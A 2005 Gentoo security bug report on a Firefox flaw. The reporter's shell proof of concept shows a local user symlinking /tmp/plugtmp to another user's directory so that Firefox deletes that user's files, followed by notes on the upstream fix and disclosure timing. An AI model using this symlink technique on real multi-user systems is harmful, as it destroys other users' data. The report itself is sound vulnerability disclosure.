Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 81011 - net-www/mozilla-firefox: local users can delete the files of mozilla users
Summary: net-www/mozilla-firefox: local users can delete the files of mozilla users
Status: RESOLVED DUPLICATE of bug 83267
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High normal (vote)
Assignee: Gentoo Security
URL: https://bugzilla.mozilla.org/show_bug...
Whiteboard: A3 [ebuild] koon
Keywords:
Depends on:
Blocks:
 
Reported: 2005-02-06 11:26 UTC by Tavis Ormandy (RETIRED)
Modified: 2005-07-17 13:06 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Tavis Ormandy (RETIRED) gentoo-dev 2005-02-06 11:26:02 UTC
I reported this upstream, #281284, but no response yet.

$ pwd
/home/taviso
$ mkdir test
$ cd test
$ for ((i=0;i<10;i++)); do touch ${RANDOM}.jpg; done
$ ls
10659.jpg  16835.jpg  26339.jpg  4062.jpg  8234.jpg
15120.jpg  22838.jpg  29316.jpg  724.jpg   9053.jpg

# now malicious user wants to remove these files (i'll use user nobody for this
example)
$ sudo -u nobody ln -s /home/taviso/test /tmp/plugtmp
$ ls -l /tmp/plugtmp
lrwxrwxrwx  1 nobody nobody 17 Feb  6 18:43 /tmp/plugtmp -> /home/taviso/test/

# now malicious user waits until I run firefox...
$ firefox
<exit firefox>
$ ls
$ echo 'arghhh, my files!'
Comment 1 Tavis Ormandy (RETIRED) gentoo-dev 2005-02-11 16:52:02 UTC
fixed in upstream cvs (all branches)
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-02-11 22:21:47 UTC
Good catch Taviso. Upstream bug is still restricted.
Comment 3 Tavis Ormandy (RETIRED) gentoo-dev 2005-02-12 03:07:24 UTC
Looks like a new point release is coming next week :)

------- Additional Comment #17 From Tavis Ormandy 2005-02-12 01:11 PST [reply] ------- 

can this bug be unrestricted now that it's RESOLVED?

------- Additional Comment #18 From Daniel Veditz 2005-02-12 03:01 PST [reply] ------- 

We'd prefer to wait until we get the 1.0.1 release into people's hands (which
should be next week), but as the bug reporter you can disclose at any time if
you think we're being too slow about it.
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2005-02-25 08:22:23 UTC
Now public, fixed in FF 1.0.1
Comment 5 Thierry Carrez (RETIRED) gentoo-dev 2005-02-25 08:32:21 UTC
Replaced by metabug 83267

*** This bug has been marked as a duplicate of 83267 ***